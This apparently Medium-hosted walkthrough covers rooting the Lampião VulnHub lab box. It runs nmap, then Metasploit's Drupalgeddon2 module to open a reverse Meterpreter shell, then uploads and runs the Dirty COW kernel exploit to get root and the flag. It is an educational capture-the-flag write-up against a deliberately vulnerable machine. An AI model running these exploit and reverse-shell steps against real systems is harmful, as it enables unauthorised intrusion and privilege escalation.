Lampião Walkthrough

Published in

InfoSec Adventures

4 min readNov 16, 2018

Lampião is another box from vulnhub. The level is stated as easy and overall the box is beginner friendly.
You download it from here: https://www.vulnhub.com/entry/lampiao-1,249/

The output of the nmap scan:

root@kali:~# nmap -A -p- 192.168.1.194
Nmap scan report for lampiao (192.168.1.194)
Host is up (0.00023s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
|   2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
|   256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_  256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp   open  http?
| fingerprint-strings: 
|   NULL: 
|     _____ _ _ 
|     |_|/ ___ ___ __ _ ___ _ _ 
|     \x20| __/ (_| __ \x20|_| |_ 
|     ___/ __| |___/ ___|__,_|___/__, ( ) 
|     |___/ 
|     ______ _ _ _ 
|     ___(_) | | | |
|     \x20/ _` | / _ / _` | | | |/ _` | |
|_    __,_|__,_|_| |_|
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Lampi\xC3\xA3o
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.70%I=7%D=11/6%Time=5BE144DE%P=x86_64-pc-linux-gnu%r(NULL
SF:,1179,"\x20_____\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\|_\x20\x20\x20_\|\x20\|\x20\(\x
SF:20\)\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\n\x20\x20\|\x20\|\x20\|\x20\|_\|/\x20___\x20\x20\x20\x20___\x20\x20
SF:__\x20_\x20___\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\x20\x20\|\x20\|\x20\|\x20__\|\x20/\x20__\|\x20\x20/\x20_\x20\\/\x20_`\
SF:x20/\x20__\|\x20\|\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20_\
SF:|\x20\|_\|\x20\|_\x20\x20\\__\x20\\\x20\|\x20\x20__/\x20\(_\|\x20\\__\x
SF:20\\\x20\|_\|\x20\|_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\\___/\x20\\__\|
SF:\x20\|___/\x20\x20\\___\|\\__,_\|___/\\__,\x20\(\x20\)\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20__/\x20\|/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|___/\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\n______\x20_\x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20_\x20\n\|\x20\x20___\(_\)\x20\x20\x
SF:20\x20\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\|\n\
SF:|\x20\|_\x20\x20\x20_\x20\x20\x20\x20__\|\x20\|_\x20\x20\x20_\x20_\x20_
SF:_\x20___\x20\x20\x20__\x20_\x20\x20\x20\x20___\x20\x20__\x20_\x20_\x20\
SF:x20\x20_\x20\x20__\x20_\|\x20\|\n\|\x20\x20_\|\x20\|\x20\|\x20\x20/\x20
SF:_`\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20\\\x20/\x20_`\x20\|\x20\x
SF:20/\x20_\x20\\/\x20_`\x20\|\x20\|\x20\|\x20\|/\x20_`\x20\|\x20\|\n\|\x2
SF:0\|\x20\x20\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|_\|\x20\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|\x20\x20__/\x20\(_\|\x20\|\x20\|
SF:_\|\x20\|\x20\(_\|\x20\|_\|\n\\_\|\x20\x20\x20\|_\|\x20\x20\\__,_\|\\__
SF:,_\|_\|\x20\|_\|");
MAC Address: 08:00:27:3D:F3:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms lampiao (192.168.1.194)

First, I checked out port 80, but it only returned an ASCII art, so I moved on to exploring port 1898. Nmap tells us the Drupal version used and also some of the disallowed entries in the robots.txt file. This version of Drupal is known for a famous vulnerability called Drupalgeddon. I fired up Metasploit console and searched for “drupalgeddon”.

msf > search drupalgeddonMatching Modules================Name: exploit/unix/webapp/drupal_drupalgeddon2  
Disclosure Date: 2018-03-28    
Rank: excellent  
Check: Yes 
Description: Drupal Drupalgeddon 2 Forms API Property Injection

Now, let’s set up the module…

msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > show optionsModule options (exploit/unix/webapp/drupal_drupalgeddon2):   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DUMP_OUTPUT  false         no     If output should be dumped
   PHP_FUNC     passthru      yes    PHP function to execute
   Proxies                    no     A proxy chain
   RHOST                      yes    The target address
   RPORT        80            yes    The target port (TCP)
   SSL          false         no     Negotiate SSL/TLS 
   TARGETURI    /             yes    Path to Drupal install
   VHOST                      no     HTTP server virtual hostExploit target:   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.194
rhost => 192.168.1.194
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
rport => 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > check[*] Drupal 7 targeted at http://192.168.1.194:1898/
[+] Drupal appears unpatched in CHANGELOG.txt
[+] 192.168.1.194:1898 The target is vulnerable.
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit[*] Started reverse TCP handler on 192.168.1.120:4444
[*] Drupal 7 targeted at http://192.168.1.194:1898/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Sending stage (38247 bytes) to 192.168.1.194
[*] Meterpreter session 1 opened (192.168.1.120:4444 -> 192.168.1.194:38018) at 2018-11-06 07:25:22 -0500meterpreter >

I successfully got a meterpreter reverse shell. I began the enumeration by gathering information about the operating system and kernel. After extensive search, I found the correct exploit to elevate my privileges and become root.

Here is the exploit, I used: https://www.exploit-db.com/exploits/40847/

I downloaded the exploit source code and uploaded it to the machine via the meterpreter session. Next, I compiled the code as suggested and after running it the password root password will be “dirtyCowFun”. In order to switch to the root user, we need a TTY shell or at least a pseudo terminal. Since python was installed, I used a simple one-liner to spawn a shell.

meterpreter > upload /root/Downloads/exploit.c
[*] uploading  : /root/Downloads/exploit.c -> exploit.c
[*] Uploaded -1.00 B of 10.03 KiB (-0.01%): /root/Downloads/exploit.c -> exploit.c
[*] uploaded   : /root/Downloads/exploit.c -> exploit.c
meterpreter > shell
Process 12720 created.
Channel 20 created.
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o exploit exploit.cpp -lutil
./exploit
Running ...
Received su prompt (Password: )
Root password is:   dirtyCowFun
Enjoy! :-)
python -c 'import pty; pty.spawn("/bin/sh")'
$ su root
su root
Password: dirtyCowFunroot@lampiao:/var/tmp# cd /root
root@lampiao:~# ls
flag.txt
root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366

I got root access on the machine and acquired the final flag:

9740616875908d91ddcdaa8aea3af366

Before you go…

Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏

Lampião Walkthrough

Before you go…

Written by Mr. Robot